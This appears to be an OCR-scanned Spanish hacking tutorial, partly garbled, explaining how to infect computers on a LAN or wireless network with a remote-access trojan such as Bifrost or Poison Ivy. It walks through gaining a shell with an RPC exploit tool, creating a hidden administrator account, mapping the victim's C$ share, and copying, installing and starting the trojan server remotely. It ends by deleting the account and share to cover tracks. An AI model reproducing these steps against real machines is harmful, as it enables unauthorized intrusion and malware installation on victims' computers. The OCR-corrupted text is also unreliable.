Вы находитесь на странице: 1из 5

L[ecutar un 1royano en una ked LAN - W|re|ess 8y AN1kAk

nerram|entas necesar|as:
Un 1royano (8|frost, o|son IV, Shark, Ltc.)
kAn1 II (Mass|ve kC Lxp|o|t)
Los programas y |a ayuda necesar|a, |a podras encontrar en www.e-r00t.net
asare a deta||ar como ut|||zar este metodo de Infecc|on.
Una vez |e|do e| tutor|a| de Indetectab|es de oro, hecho por m|, podremos |r a| grano.
L[ecutamos una conso|a de DCS y tec|eamos c:\kath 192.168.0.1 192.168.0.28 Esas IP`s privadas
varian segn la red lan. No siempre son las mismas.
Ln este casout|||zamos e| rango de |p: c:\kath 10.10.20.1 10.10.20.255 y Como muestra la
imagen, nos da Shell en la maquina 10.10.20.6

Bueno Tecleamos NET USER, para ver quien esta como administrador, si hay invitados, etc.
acuerdate que ya estamos en la shell de 10.10.20.6
Ahora expliccare algunas pautas o comandos a tener en cuenta:

C:\WINNT\system32>net user test pwd /add -------Para crearnos un usuario(invitado)
C:\WINNT\system32>net localgroup administradores test /add ----Para ponerlo como
Admin
C:\WINNT\system32>net localgroup administradores-----Para ver si estamos como Admin


Como vemos test(el usuario que hemos creado con password pwd), esta dentro de
administrador
Terminado este paso, procederemos a la infeccion de la pc, pero antes es necesario tener en
cuenta que si la pc de la victima se reinicia, le aparecera un cartel de aviso que estamos
conectado a su pc, pero esto solo pasa si reinicia, sino no aparecera ningun tipo de aviso.
Bueno en otra consola de DoS, ponemos estas lineas para mapearlo en nuestro explorer como
unidad X
C:\>nbtstat -a 10.10.20.6 Para saber el nombre de maquina
C:\>net use x: \\10.10.20.6\C$ pwd /user:VPRADO\test Para maperlo en el explorer

Ahora podremos acceder desde e| exp|orer.

Nos vamos a su windows/system32 y copiamos nuestro server editado. En este caso mi server
se llama loadqm.exe, nos desmapeamos de X(desconectar unidad) y regresamos a la consola
de la shell de
10.10.20.6, y a ejecutarlo remotamente.
C:\WINNT\system32>loadqm.exe install
C:\WINNT\system32>loadqm.exe
C:\WINNT\system32>net start loadqm.exe
Ahora para finalizar, Borramos la cuenta de usuario que creamos.

Ahora so|o queda e[ecutar e| c||ente, y tendremos |a v|ct|maconectada:


1amb|en hay otra manera mucho mas fac||
En la shell de 10.10.20.6, poniamos
C:\WINNT\system32>net share ----- Para ver que recursos tiene compartidos
C:\WINNT\system32>net share test2=c: ----- Para comaprtir su disco C: como test2

Segu|do a esto, vamos a:
In|c|o>8uscar>Lqu|po


Normalmente, se puede entrar al disco, pero dependiendo de los permisos que tenga esa
maquina.
En este caso a lo que voy es que hay un pequeo truco, la carpeta
temp, es casi al 100% total acceso, se copia el troyano en dicha carpeta y desde la shell se
copia al System32 y se aplica lo antes mencionado para ejecutar el troyano.
Seguido de esto borrar el compartido
C:\WINNT\system32>net share test2 /delete
net share test2 /delete
test2 ha sido eliminado.
Este metodo es viejo, solo le hice mejoras y esta bien explicado.
||sto! Lsa fue |a |nfecc|on por ked LAN - W|re|ess
Lspero que |es haya s|do de ut|||dad.
odras encontrar tutor|a|es como este y muchos mas en www.e-r00t.net
Sa|udosa todos! hasta |a prox|ma!

AN1kAk

Вам также может понравиться